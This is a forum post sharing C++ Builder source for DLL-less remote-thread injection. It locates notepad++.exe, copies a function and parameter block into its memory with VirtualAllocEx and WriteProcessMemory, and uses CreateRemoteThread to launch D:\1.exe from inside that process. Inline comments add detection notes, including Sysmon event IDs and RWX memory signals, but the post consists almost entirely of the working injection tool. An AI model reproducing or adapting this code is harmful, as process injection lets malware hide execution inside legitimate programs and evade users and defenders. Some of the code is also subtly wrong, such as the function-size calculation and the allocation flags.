
Locked Inyeccion sin DLL [C++ XE2] [Fakedo0r]


Expermicid


[lenguaje=delphi]//******************************************************************************

//* AUTOR: Fakedo0r .:PD-TEAM:.

//* FECHA: 01.09.2012

//* CORREO: [email protected]

//* BLOG: Sub-Soul.blogspot.com / Sub-Soul.com

//* USO: Injector;

//******************************************************************************

//******************************************************************************

//#INCLUDE

//******************************************************************************

#include

//******************************************************************************

//DECLARACION DE FUNCIONES / PROCEDIMIENTOS

//******************************************************************************

// Forward declaration of the helper defined at the end of this listing: it
// allocates a region inside the process identified by hProcess and writes
// iBufferSize bytes from lpBuffer into that region.
LPVOID AllocAndCopyMem(HANDLE hProcess, const LPVOID lpBuffer,
SIZE_T iBufferSize);

// Function-pointer type with the parameter list of ShellExecute. The T_INJECT
// field of this type is filled from GetProcAddress(..., "ShellExecuteW") in
// Injector().
typedef HINSTANCE(WINAPI *__ShellExecute)(HWND, LPCTSTR, LPCTSTR, LPCTSTR,
LPCTSTR, int);

//******************************************************************************

//DECLARACION DE ESTRUCTURAS

//******************************************************************************

// Parameter block that Injector() fills locally and then copies into the
// target process; its remote address is passed as the thread argument to
// Injected().
struct T_INJECT {
    // Address of ShellExecuteW as resolved in the injecting process; the
    // remote thread calls through this value unchanged.
    __ShellExecute __ShlExe;
    // File path handed to ShellExecuteW (third argument of the call).
    wchar_t cExe[MAX_PATH];
    // Verb handed to ShellExecuteW (second argument of the call).
    wchar_t cOper[MAX_PATH];
};

//******************************************************************************

//<--- LA FUNCION QUE VAMOS A INYECTAR --->

//******************************************************************************

// Routine whose machine code Injector() copies into the target process and
// starts there as a remote thread. It touches nothing but the T_INJECT block
// it receives: it calls the stored function pointer with the stored verb and
// path and a show-command value of 1 (SW_SHOWNORMAL).
//
// Defender view: the effect is a process launch whose parent is the *target*
// process rather than the injecting one, so an unexpected child under an
// otherwise quiet application is the observable outcome.
void Injected(T_INJECT *tInj) {
    tInj->__ShlExe(0, tInj->cOper, tInj->cExe, NULL, NULL, 1);
}

//******************************************************************************

//<--- LA FUNCION QUE OPERA LA INYECCION --->

//******************************************************************************

// Drives the whole sequence shown in this post: locate a process by image
// name, open it, copy a parameter block and the bytes of Injected() into it,
// and run those bytes with CreateRemoteThread.
//
// Defender view: the API chain used here (Toolhelp snapshot -> OpenProcess with
// PROCESS_ALL_ACCESS -> VirtualAllocEx -> WriteProcessMemory ->
// CreateRemoteThread) is the classic remote-thread injection pattern. It is
// visible to endpoint telemetry as a cross-process handle open with full
// access (e.g. Sysmon Event ID 10, ProcessAccess), a remote thread creation
// (Sysmon Event ID 8, CreateRemoteThread) whose start address lies in private,
// non-image memory, and a subsequent process creation (Sysmon Event ID 1)
// parented to the target process.
void Injector() {
    DWORD dwPID = 0;
    DWORD dwExitCode = 0;
    UINT uTamFun = 0;
    HANDLE hProcess;
    HANDLE hThread;
    HMODULE hModule;

    PROCESSENTRY32 tProcEntry;
    T_INJECT tInj;

    // Take a snapshot of all running processes; hProcess temporarily holds the
    // snapshot handle, not a process handle.
    hProcess = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    tProcEntry.dwSize = sizeof(PROCESSENTRY32);

    // Walk the snapshot and keep the PID of the first entry whose image name
    // equals "notepad++.exe".
    if (Process32First(hProcess, &tProcEntry)) {
        do {
            if (String(tProcEntry.szExeFile) == "notepad++.exe") {
                dwPID = tProcEntry.th32ProcessID;
                break;
            }
        }
        while (Process32Next(hProcess, &tProcEntry));
    }

    // Release the snapshot handle.
    CloseHandle(hProcess);

    // Open a handle to the target process, requesting every access right.
    hProcess = OpenProcess(PROCESS_ALL_ACCESS, false, dwPID);

    // Resolve the API pointer in this (the injecting) process.
    hModule = LoadLibrary(UnicodeString("Shell32.dll").w_str());
    tInj.__ShlExe = (__ShellExecute)(DWORD) GetProcAddress(hModule,
    "ShellExecuteW");

    // Fill in the string fields of the parameter block.
    lstrcpy(tInj.cExe, L"D:\\1.exe");
    lstrcpy(tInj.cOper, L"open");

    // Allocate memory in the target and copy the parameter block into it.
    LPVOID lpStruct = AllocAndCopyMem(hProcess, &tInj, sizeof(T_INJECT));

    // Compute the size of Injected() as the difference between the addresses
    // of Injector and Injected.
    // NOTE(review): this presumes the two functions are laid out back to back
    // in the order they appear in the source - confirm against the build.
    uTamFun = (UINT)Injector - (UINT)Injected;

    // Allocate memory in the target and copy the function bytes into it.
    LPVOID lpEsp = AllocAndCopyMem(hProcess, &Injected, uTamFun);

    // Create the remote thread: start address is the copied code, argument is
    // the copied parameter block.
    hThread = CreateRemoteThread(hProcess, NULL, 0,
    (LPTHREAD_START_ROUTINE)lpEsp, lpStruct, 0, NULL);

    if (hThread != 0) {
        // Block until the remote thread terminates (a thread handle becomes
        // signaled when the thread ends).
        WaitForSingleObject(hThread, INFINITE);
        // Read the thread's exit code; the value is not used afterwards.
        GetExitCodeThread(hThread, &dwExitCode);
        // Release the handle of the created thread.
        CloseHandle(hThread);
        // Free both remote allocations in the target process.
        VirtualFreeEx(hProcess, lpStruct, 0, MEM_RELEASE);
        VirtualFreeEx(hProcess, lpEsp, 0, MEM_RELEASE);
    }

    // Release the process handle.
    CloseHandle(hProcess);
}

//******************************************************************************

//<--- RESERVA ESPACIO Y ESCRIBE EN LA MEMORIA --->

//******************************************************************************

// Allocates iBufferSize bytes inside the process identified by hProcess and
// writes the contents of lpBuffer into the new region.
//
// Parameters:
//   hProcess    - handle to the process that receives the allocation.
//   lpBuffer    - local buffer to copy from.
//   iBufferSize - number of bytes to allocate and copy.
// Returns the value returned by VirtualAllocEx; neither call's result is
// checked here.
//
// Defender view: the protection requested is PAGE_EXECUTE_READWRITE for every
// call, including the data-only parameter block, so each use leaves a private
// read-write-execute region in the target - a common memory-scanning and EDR
// detection signal when paired with a cross-process write.
LPVOID AllocAndCopyMem(HANDLE hProcess, LPVOID lpBuffer, SIZE_T iBufferSize) {
    // Reserve memory in the remote process.
    LPVOID lpRemAlloc = VirtualAllocEx(hProcess, 0, iBufferSize,
    MEM_COMMIT | PAGE_READWRITE, PAGE_EXECUTE_READWRITE);
    // Write the buffer into the remote region.
    WriteProcessMemory(hProcess, lpRemAlloc, lpBuffer, iBufferSize, NULL);

    return lpRemAlloc;
} [/lenguaje]

Edited by Expermicid